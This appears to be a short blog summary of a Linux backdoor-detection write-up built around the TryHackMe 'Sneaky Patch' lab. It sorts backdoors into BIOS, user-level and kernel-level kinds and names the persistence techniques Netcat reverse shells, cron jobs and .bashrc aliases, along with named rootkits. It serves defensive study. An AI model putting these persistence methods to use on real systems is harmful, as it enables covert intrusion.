In my analysis, I explore how to detect and investigate a kernel backdoor in a Linux system, a sophisticated threat that can be challenging to uncover.

I also solve TryHackMe Sneaky Patch which is a perfect demonstration on how to flag Linux backdoors.

Understanding Linux Backdoors

I begin by categorizing Linux backdoors into three main types:

BIOS/UEFI/initrd Backdoors: These are the most dangerous as they are installed at the BIOS level, allowing them to bypass standard security measures and even survive a complete reinstallation of the operating system. Removing them typically requires reflashing the BIOS.

User-Level Backdoors: These are the most common and include techniques like:

Modified Binaries: Altering programs to allow login with a secret password.

Reverse Shells: Using scripts, such as those written with Netcat, to open a shell back to an attacker’s system.

Cron Jobs: Scheduling tasks to re-establish a reverse shell or execute malicious commands.

Malicious Aliases: Editing .bashrc files to create aliases that spawn a shell.

Kernel-Level Backdoors: These are more advanced and involve modifying the Linux kernel to hide processes. Because they operate with the highest privileges, they are much harder to detect. Examples of kernel-level rootkits include Adore-Ng and Dyamorphine.

Full Writeup from here.

Full Video from here.